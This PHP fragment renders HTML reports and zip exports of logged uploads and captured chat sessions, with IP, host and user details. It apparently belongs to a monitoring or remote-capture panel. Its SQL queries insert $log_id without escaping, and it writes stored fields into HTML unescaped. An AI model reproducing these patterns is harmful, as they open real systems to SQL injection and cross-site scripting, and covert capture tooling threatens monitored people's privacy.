   $html .= '            <a href="files/UPLOAD_'.$log_id.'_'.basename($ret->varchar1).'" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> UPLOAD &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>FILENAME:</strong> '.$ret->varchar1.'<br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/UPLOAD_{$log_id}_".basename($ret->varchar1), $ret->longblob1);

   return $html;
}

function handle_CHAT($log_id, $zip)
{
   $sql  = "SELECT `tag`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`varchar3`, ";
   $sql .=        "`longtext1` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE `log_id` = '$log_id'";

   $ret = db_query($sql);
   $ret = $ret[0];

   $sql  = "SELECT `content` ";
   $sql .= "FROM `note` ";
   $sql .= "WHERE `user_id` IS NULL AND ";
   $sql .=       "`log_id` = '$log_id'";

   $note = db_query($sql);
   $note = $note[0];

   $html  = '         <div id="navcontainer">'."\n";
   $html .= '            <ul>'."\n";
   $html .= '               <a href="" rel="self" id="current">'."\n";
   $html .= '                  <li>ID: '.$log_id.' &nbsp;&nbsp;&nbsp;&nbsp; DATE: '.$ret->acquired.'</li>'."\n";
   $html .= '               </a>'."\n";
   $html .= '            </ul>'."\n";
   $html .= '            <a href="files/CHAT_'.$log_id.'.txt" title="Download the file" id="show_sidebar">Download the file</a>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <div id="contentContainer">'."\n";
   $html .= '            <div id="content">'."\n";
   $html .= '               <strong>TYPE:</strong> CHAT &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>TAG:</strong> '.$GLOBALS['tagdesc'][$ret->tag].' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>IP:</strong> '.$ret->remoteip.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>HOST: </strong>'.$ret->remotehost.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '               <strong>USER:</strong> '.$ret->remoteuser.'<br /><br />'."\n";
   $html .= '               <table width="100%">'."\n";
   $html .= '                  <tr>'."\n";
   $html .= '                     <td valign="top">'."\n";
   $html .= '                        <strong>PROGRAM:</strong> '.$ret->varchar1.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '                        <strong>TOPIC:</strong> '.$ret->varchar2.' &nbsp;&nbsp;&nbsp;&nbsp;'."\n";
   $html .= '                        <strong>USERS:</strong> '.$ret->varchar3.'<br /><br />'."\n";
   $html .= '                        <pre>'.chunk_split($ret->longtext1, 100).'</pre><br /><br />'."\n";
   $html .= '                        <strong>NOTES:</strong><br />'."\n";
   $html .= '                        '.$note->content.'<br /><br />'."\n";
   $html .= '                     </td>'."\n";
   $html .= '                  </tr>'."\n";
   $html .= '               </table>'."\n";
   $html .= '            </div>'."\n";
   $html .= '         </div>'."\n";
   $html .= '         <br />'."\n";

   $zip->addFromString("files/CHAT_{$log_id}.txt", $ret->longtext1);

   return $html;
}

function handle_MIC($log_id, $zip)
{
   return;
}

$tagdesc[-1] = 'None';
$tagdesc[0] = 'Default';
$tagdesc[1] = 'Low';
$tagdesc[2] = 'Medium';
$tagdesc[3] = 'High';

define('AL_VIEW', 0x01);   // viewer access
define('AL_TECH', 0x02);   // technician access
define('AL_SERV', 0x04);   // server access
define('AL_ADMN', 0x80);   // administrator access

?>
